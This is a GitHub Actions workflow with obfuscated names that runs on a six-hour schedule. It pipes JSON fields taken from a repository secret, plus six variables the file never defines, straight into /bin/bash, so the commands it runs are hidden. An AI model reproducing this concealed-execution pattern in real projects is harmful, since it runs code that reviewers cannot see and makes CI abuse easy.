name: bushishuoy
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bushishuoy
        env:
          l7955: ${{ secrets.l7955 }}
        run: |
          echo $l7955 | jq -r .cb7795 | /bin/bash
          echo $m46609 | jq -r .amdrq21 | /bin/bash
          echo $yyre94416 | jq -r .jh8727 | /bin/bash
          echo $cdyf16487 | jq -r .g73230 | /bin/bash
          echo $iltk84 | jq -r .c51 | /bin/bash
          echo $haiyo62 | jq -r .mtbhf8 | /bin/bash
          echo $ktv7315 | jq -r .vnox3657 | /bin/bash

